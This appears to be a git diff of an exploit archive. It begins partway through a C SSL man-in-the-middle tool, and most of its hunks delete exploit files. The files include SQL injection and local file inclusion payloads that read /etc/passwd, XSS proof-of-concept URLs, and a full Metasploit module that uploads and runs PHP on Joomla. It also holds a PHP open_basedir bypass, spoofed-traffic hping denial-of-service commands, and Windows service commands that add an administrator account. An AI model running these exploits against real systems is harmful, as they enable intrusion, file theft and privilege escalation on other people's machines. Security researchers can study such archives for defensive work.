(cssl->ssl->ctx, buf[2] == 0 ?
SSLv3_client_method() : TLSv1_client_method());
if (r != 1)
fail("hack_ssl:SSL_CTX_set_ssl_version");
r = SSL_clear(cssl->ssl);
if (r != 1)
fail("hack_ssl:SSL_clear");
r = SSL_connect(cssl->ssl);
if (r != 1)
fail("hack_ssl:SSL_connect");
/* ssl3_setup_buffers(io->ssl);
ssl_get_new_session(io->ssl, 0); */
r = SSL_write(cssl->ssl, TRICK, sizeof(TRICK)-1);
if (r != sizeof(TRICK)-1)
fail("hack_ssl:SSL_connect");
cssl->ssl->in_handshake++;
cssl->ssl->method->ssl3_enc->change_cipher_state =
bogus_change_cipher_state;
}
else {
/* schedule suicide */
alarm(5);
}
rec_write(cssl, buf, l);
}
#define HTTP_OK "HTTP/1.0 200 Connected\r\n\r\n"
void
handle_http_req
(int sock, in_addr_t *ip, int *port)
{
int r, l, k;
unsigned char buf[1 << 16];
char str[100];
unsigned short num;
struct hostent *he;
l = 0;
for (;;) {
r = read(sock, buf + l, sizeof(buf)-1 - l);
if (r <= 0)
fail("handle_http_req:read");
for (k = l; r > 0; ++k, --r)
if (buf[k] != '\r')
buf[l++] = buf[k];
if (l >= 2 && buf[l-1] == '\n' && buf[l-2] == '\n')
break;
if (l >= sizeof(buf)-1)
fail("handle_http_req:req too big");
}
buf[l] = '\0';
r = sscanf(buf, "CONNECT %99[0-9A-Za-z.-]:%hu", str, &num);
if (r != 2)
fail("handle_http_req:bad request");
he = gethostbyname(str);
if (he == NULL || he->h_length != sizeof(in_addr_t))
fail("handle_http_req:gethostbyname");
r = write(sock, HTTP_OK, sizeof(HTTP_OK)-1);
if (r != sizeof(HTTP_OK)-1)
fail("handle_http_req:write");
*ip = *(in_addr_t *)(he->h_addr_list[0]);
*port = num;
}
int
main
(int argc, const char **argv)
{
pid_t pid;
int ssock, asock, csock;
SSL_CTX *ctx;
in_addr_t ip;
int port;
struct ssl_io_t assl, cssl;
setup_ssl_ctx(&ctx);
setup_server(&ssock, atoi(argv[1]));
for (;;) {
do_accept(&asock, ssock);
pid = fork();
if (pid == -1)
fail("main:fork");
else if (pid == 0) {
close(ssock);
handle_http_req(asock, &ip, &port);
setup_client(&csock, ip, port);
setup_ssl_io(&assl, ctx, asock, 3);
setup_ssl_io(&cssl, ctx, csock, 3);
hack_ssl(&assl, &cssl);
ssl_io(&assl, &cssl);
return 0;
}
else {
close(asock);
}
}
}

26
platforms/php/webapps/14231.txt
View file

@ -1,26 +0,0 @@
1 ########################################## 1
0 I'm Sid3^effects member from Inj3ct0r Team 1
1 ########################################## 0
0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-1
Name : Bs Auto_Classifieds Script(articlesdetails.php) Sqli Vulnerability
Date : july 5,2010
Critical Level : HIGH
vendor URL :http://www.brotherscripts.com/
Price:$24.95
Author : Sid3^effects aKa HaRi <shell_c99[at]yahoo.com>
special thanks to : r0073r (inj3ct0r.com),L0rd CruSad3r,MaYur,MA1201,KeDar,Sonic,gunslinger_
greetz to :www.topsecure.net ,All ICW members and my friends :) luv y0 guyz
#######################################################################################################
Description :
Setup your own auto classifieds website with BrotherScripts.com. We are offering a top quality auto listings software which allows car buyers to search available autos for free. The auto listings are highly detailed with photos, dealer/person information and driving directions linked to MapQuest.
Dealers and car sellers can list their properties, too. After a new dealer has registered, he/she is able to select and buy a package depending on how many adverts they want to to post and for the time duration they want to show them. Payments are done via PayPal or 2Checkout. Before expiration of the account the dealer will be informed by sending a few emails - 10 days before the expiration of his account, 5 and 1 days. All dealers' listings are deleted automatically after 24 hours of expiration of his account
#######################################################################################################
Xploit :SQli Vulnerability
DEMO URL :http://server/Auto_Classifieds/articlesdetails.php?id=[sqli]
###############################################################################################################
# 0day no more
# Sid3^effects

82
platforms/php/webapps/15462.txt
View file

@ -1,82 +0,0 @@
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
# Exploit Title: Joomla Component com_dcnews LFI Vulnerability
# Date: 6-11-2010
# Author: Th3 RDX
# Software Link: n/a
# Version: n/a
# Tested on: online Sites
# category: webapp/Joomla
# Code : n/a
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
L0v3 To: R00T, R45c4l, Agent: 1c3c0ld, Big Kid, Br0wn Sug4r, Sid3^effects, L0rd CruSad3r,
Sonic , r0073r(inj3ct0r.com)
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
<3 Love: -[SiLeNtp0is0n]-, stRaNgEr(lucky), inX_rOot, NEO H4cK3R, DarkL00k, G00g!3 W@rr!0r,
str1k3r, co0Lt04d , ATUL DWIVEDI , Jackh4xor
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
......\m/ INDIAN CYBER ARMY \m/......
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
##############################################################################
%//
----- [ Founder ] -----
Th3 RDX
----- [ E - mail ] -----
th3rdx@gmail.com
%\\
##############################################################################
##############################################################################
%//
----- [Title] -----
Joomla Component com_dcnews LFI Vulnerability
----- [ Vendor ] -----
n/a
%\\
##############################################################################
##############################################################################
%//
----- [ Bug (s) ] -----
----- [ Local File Inclusion ] -----
=> [ EXPLOIT ]
http://server/index.php?option=com_dcnews&view=dcnews&controller=[LFI]
=> [ Example/POC ]
http://server/index.php?option=com_dcnews&view=dcnews&controller=../../../../../../../../../../etc/passwd%00
%\\
##############################################################################
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
=> PROUD TO BE AN INDIAN | Anythning for INDIA | JAI-HIND | Maa Tujhe Salam
=> c0d3 for motherland, h4ck for motherland
==> i'm worst than a useless <==
>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>.
Bug discovered : 06 November 2010
finish(0);
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
#End 0Day#

5
platforms/php/webapps/23979.txt
View file

@ -1,5 +0,0 @@
source: http://www.securityfocus.com/bid/10100/info
Multiple vulnerabilities have been identified in various modules of the application. These vulnerabilities may allow a remote attacker to carry out various attacks such as path disclosure, cross-site scripting, HTML injection, SQL injection, directory traversal, and arbitrary file upload.
tiki-browse_categories.php?find=&deep=off&parentId=[VID]&offset=[INT]&sort_mode=[SQL]

5
platforms/php/webapps/23980.txt
View file

@ -1,5 +0,0 @@
source: http://www.securityfocus.com/bid/10100/info
Multiple vulnerabilities have been identified in various modules of the application. These vulnerabilities may allow a remote attacker to carry out various attacks such as path disclosure, cross-site scripting, HTML injection, SQL injection, directory traversal, and arbitrary file upload.
tiki-index.php?page=[VPG]&comments_threshold=[INT]&comments_offset=[SQL]

5
platforms/php/webapps/23981.txt
View file

@ -1,5 +0,0 @@
source: http://www.securityfocus.com/bid/10100/info
Multiple vulnerabilities have been identified in various modules of the application. These vulnerabilities may allow a remote attacker to carry out various attacks such as path disclosure, cross-site scripting, HTML injection, SQL injection, directory traversal, and arbitrary file upload.
tiki-user_tasks.php?task_useDates=&taskId=[VID]&offset=[SQL]

7
platforms/php/webapps/27720.txt
View file

@ -1,7 +0,0 @@
source: http://www.securityfocus.com/bid/17643/info
PHPLDAPAdmin is prone to multiple input-validation vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input.
An attacker can exploit these issues to execute arbitrary HTML and script code in the browser of a victim user in the context of the affected website. This may allow the attacker to steal cookie-based authentication credentials, to control how the site is rendered to the user, and to launch other attacks.
http://www.example.com/template_engine.php?server_id=0&dn=%22%3Cscript%3Ealert(&#039;r0t&#039;)%3C/script%3E

7
platforms/php/webapps/28285.txt
View file

@ -1,7 +0,0 @@
source: http://www.securityfocus.com/bid/19180/info
The Zyxel Prestige 660H-61 ADSL Router is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input.
An attacker may leverage this issue to have arbitrary script code execute in the browser of an unsuspecting user in the context of the affected site. This may help the attacker steal cookie-based authentication credentials and launch other attacks.
http://www.example.com/Forms/rpSysAdmin?a=%3Cscript%3Ealert(&#039;www.eazel.es&#039;)%3C/script%3E

9
platforms/php/webapps/32260.txt
View file

@ -1,9 +0,0 @@
source: http://www.securityfocus.com/bid/30731/info
Freeway is prone to multiple local file-include vulnerabilities because it fails to properly sanitize user-supplied input.
An attacker can exploit these vulnerabilities using directory-traversal strings to view local files in the context of the webserver process. This may aid in further attacks.
Freeway 1.4.1.171 is vulnerable; other versions may also be affected.
http://www.example.com/[installdir]/includes/languages/french/account_newsletters.php? language=../../../../../../../../../../../../../etc/passwd%00

10
platforms/php/webapps/33396.txt Executable file
View file

@ -0,0 +1,10 @@
source: http://www.securityfocus.com/bid/37290/info
ZeeJobsite is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input.
An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
This issue affects ZeeJobsite 3x; other versions may be vulnerable as well.
http://www.example.com/basic_search_result.php?title=<script>alert(/XSS/)</script>

7
platforms/php/webapps/33400.txt Executable file
View file

@ -0,0 +1,7 @@
source: http://www.securityfocus.com/bid/37311/info
Ez Cart is prone to is prone to a cross-site scripting vulnerability because it fails to sanitize user-supplied input.
An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
http://www.example.com/index.php?action=showcat&cid=1&sid=[XSS]

174
platforms/php/webapps/9910.rb
View file

@ -1,174 +0,0 @@
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
require 'msf/core'
class Metasploit3 < Msf::Exploit::Remote
include Msf::Exploit::Remote::HttpClient
def initialize(info = {})
super(update_info(info,
'Name' => 'Joomla 1.5.12 TinyBrowser File Upload Code Execution',
'Description' => %q{
This module exploits a vulnerability in the TinyMCE/tinybrowser plugin.
This plugin is not secured in version 1.5.12 of joomla and allows the upload
of files on the remote server.
By renaming the uploaded file this vulnerability can be used to upload/execute
code on the affected system.
},
'Author' => [ 'spinbad <spinbad.security[at]googlemail.com>' ],
'License' => MSF_LICENSE,
'Version' => '$Revision$',
'References' =>
[
['URL', 'http://milw0rm.com/exploits/9296'],
['URL', 'http://developer.joomla.org/security/news/301-20090722-core-file-upload.html'],
],
'Privileged' => false,
'Payload' =>
{
'DisableNops' => true,
'Compat' =>
{
'ConnectionType' => 'find',
},
'Space' => 1024,
},
'Platform' => 'php',
'Arch' => ARCH_PHP,
'Targets' => [[ 'Automatic', { }]],
'DisclosureDate' => 'July 22 2009',
'DefaultTarget' => 0))
register_options(
[
OptString.new('URI', [true, "Joomla directory path", "/"]),
], self.class)
end
def check
res = send_request_raw({
'uri' => datastore['URI'] + '/plugins/editors/tinymce/jscripts/tiny_mce/plugins/tinybrowser/upload.php?type=file&folder='
}, 25)
if (res and res.body =~ /flexupload.swf/)
return Exploit::CheckCode::Vulnerable
end
return Exploit::CheckCode::Safe
end
def retrieve_obfuscation()
end
def exploit
cmd_php = '<?php ' + payload.encoded + '?>'
# Generate some random strings
cmdscript = rand_text_alpha_lower(20)
boundary = rand_text_alphanumeric(6)
# Static files
directory = '/images/stories/'
tinybrowserpath = '/plugins/editors/tinymce/jscripts/tiny_mce/plugins/tinybrowser/'
cmdpath = directory + cmdscript
# Get obfuscation code (needed to upload files)
obfuscation_code = nil
res = send_request_raw({
'uri' => datastore['URI'] + tinybrowserpath + '/upload.php?type=file&folder='
}, 25)
if (res)
if(res.body =~ /"obfus", "((\w)+)"\)/)
obfuscation_code = $1
print_status("Successfully retrieved obfuscation code: #{obfuscation_code}")
else
print_error("Error retrieving obfuscation code!")
return
end
end
# Upload shellcode (file ending .ph.p)
data = "--#{boundary}\r\nContent-Disposition: form-data; name=\"Filename\"\r\n\r\n"
data << "#{cmdscript}.ph.p\r\n--#{boundary}"
data << "\r\nContent-Disposition: form-data; name=\"Filedata\"; filename=\"#{cmdscript}.ph.p\"\r\n"
data << "Content-Type: application/octet-stream\r\n\r\n"
data << cmd_php
data << "\r\n--#{boundary}--"
res = send_request_raw({
'uri' => datastore['URI'] + tinybrowserpath + "/upload_file.php?folder=/images/stories/&type=file&feid=&obfuscate=#{obfuscation_code}&sessidpass=",
'method' => 'POST',
'data' => data,
'headers' =>
{
'Content-Length' => data.length,
'Content-Type' => 'multipart/form-data; boundary=' + boundary,
}
}, 25)
if (res and res.body =~ /File Upload Success/)
print_status("Successfully uploaded #{cmdscript}.ph.p")
else
print_error("Error uploading #{cmdscript}.ph.p")
end
# Complete the upload process (rename file)
print_status("Renaming file from #{cmdscript}.ph.p_ to #{cmdscript}.ph.p")
res = send_request_raw({
'uri' => datastore['URI'] + tinybrowserpath + 'upload_process.php?folder=/images/stories/&type=file&feid=&filetotal=1'
})
# Rename the file from .ph.p to .php
res = send_request_cgi({
'method' => 'POST',
'uri' => datastore['URI'] + tinybrowserpath + '/edit.php?type=file&folder=',
'vars_post' =>
{
'actionfile[0]' => "#{cmdscript}.ph.p",
'renameext[0]' => 'p',
'renamefile[0]' => "#{cmdscript}.ph",
'sortby' => 'name',
'sorttype' => 'asc',
'showpage' => '0',
'action' => 'rename',
'commit' => '',
}
}, 10)
if (res and res.body =~ /successfully renamed./)
print_status ("Renamed #{cmdscript}.ph.p to #{cmdscript}.php")
else
print_error("Failed to rename #{cmdscript}.ph.p to #{cmdscript}.php")
end
# Finally call the payload
print_status("Calling payload: #{cmdscript}.php")
res = send_request_raw({
'uri' => "#{datastore['URI'] }images/stories/#{cmdscript}.php"
}, 25)
end
end

37
platforms/php/webapps/9960.txt
View file

@ -1,37 +0,0 @@
Description:
------------
Via this bug , attacker can save a file in path that not allowed in
open_basedir .
Reproduce code:
---------------
<?php
// Author : Sina Yazdanmehr (R3d.W0rm) ; Our Site : http://IrCrash.com
if(!extension_loaded('pdf')){
die('pdf extension required .');
}else{
$__PATH = $_GET['p']; /*The path that u want save file in .ex:
/etc/file.php*/
$__VALUE = $_GET['v']; /*The text that u want save in file .ex:
<?php include $_GET[f];?>*/
if(!isset($__PATH,$__VALUE)){
die('/expl.php?p=[path_u_want_save_file]/[file_name]&v=[value_u_want_sav
e_in_file]');
}
$__IRCRASH = pdf_new();
pdf_open_file($__IRCRASH,$__PATH);
pdf_begin_page($__IRCRASH,612,792);
pdf_add_note($__IRCRASH,100,650,200,750,$__VALUE,'R3d.W0rm','note',0);
pdf_end_page($__IRCRASH);
pdf_close($__IRCRASH);
pdf_delete($__IRCRASH);
print('<p>IrCrash Security Team .</p>');
print('<p>' . $__PATH . "\n" . 'created .</p>');}
?>
Expected result:
----------------
When attacker run this code , a file in a path that attacker input in
`p` in url , whith value that attacker input in `v` in url.

7
platforms/windows/dos/21916.txt
View file

@ -1,7 +0,0 @@
source: http://www.securityfocus.com/bid/5917/info
A weakness has been reported in some PC Firewall packages that could allow remote denial of service attacks. The problem is in the handling of spoofed traffic.
Under some circumstances, it is possible for remote users to deny service to various sites for users of PC Firewall software. By sending spoofed traffic that could be deemed malicious by the firewall software package, an attacker could effectively limit the sites a system is capable of reaching.
hping -e 13 -d 2 -s 6000 -p 2140 -2 host1.example.com -c 2 -a host2.example.com

7
platforms/windows/dos/21917.txt
View file

@ -1,7 +0,0 @@
source: http://www.securityfocus.com/bid/5917/info
A weakness has been reported in some PC Firewall packages that could allow remote denial of service attacks. The problem is in the handling of spoofed traffic.
Under some circumstances, it is possible for remote users to deny service to various sites for users of PC Firewall software. By sending spoofed traffic that could be deemed malicious by the firewall software package, an attacker could effectively limit the sites a system is capable of reaching.
hping -e 13 -d 2 -s 6000 -p 2140 -2 host1.example.com -c 2 -a host2.example.com

25
platforms/windows/dos/9959.txt
View file

@ -1,25 +0,0 @@
#######################################################
#
# GPG4Win - GNU Privacy Assistant - GPA.EXE - Crash PoC
# Found By: Dr_IDE
# Tested On: 7RC, XPSP3
# Usage: Paste this into GPA Clipboard, Verify.
#
#######################################################
'''
-----BEGIN PGP MESSAGE-----
Charset: ISO-8859-1
Version: GnuPG v1.4.9 (GNU/Linux)
Comment: If you Verify me in Clipboard Mode, I go BOOM!
Comment: This is the absolute minimum of content to cause the crash
Comment: Doesn't seem to overwrite anything though, even @ 10000+ chars
A==
=B00M
-----END PGP MESSAGE-----
'''
#[pocoftheday.blogspot.com]

8
platforms/windows/local/9989.txt
View file

@ -1,8 +0,0 @@
To exploit this issue, attackers require local, interactive access to an affected computer.
The following example commands are available:
sc stop "AdobeActiveFileMonitor8.0"
sc config "AdobeActiveFileMonitor8.0" binPath= "cmd /c net user adobe kills /add && net localgroup Administrators adobe /add"
sc start "AdobeActiveFileMonitor8.0"
runas /noprofile /user:%COMPUTERNAME%\adobe cmd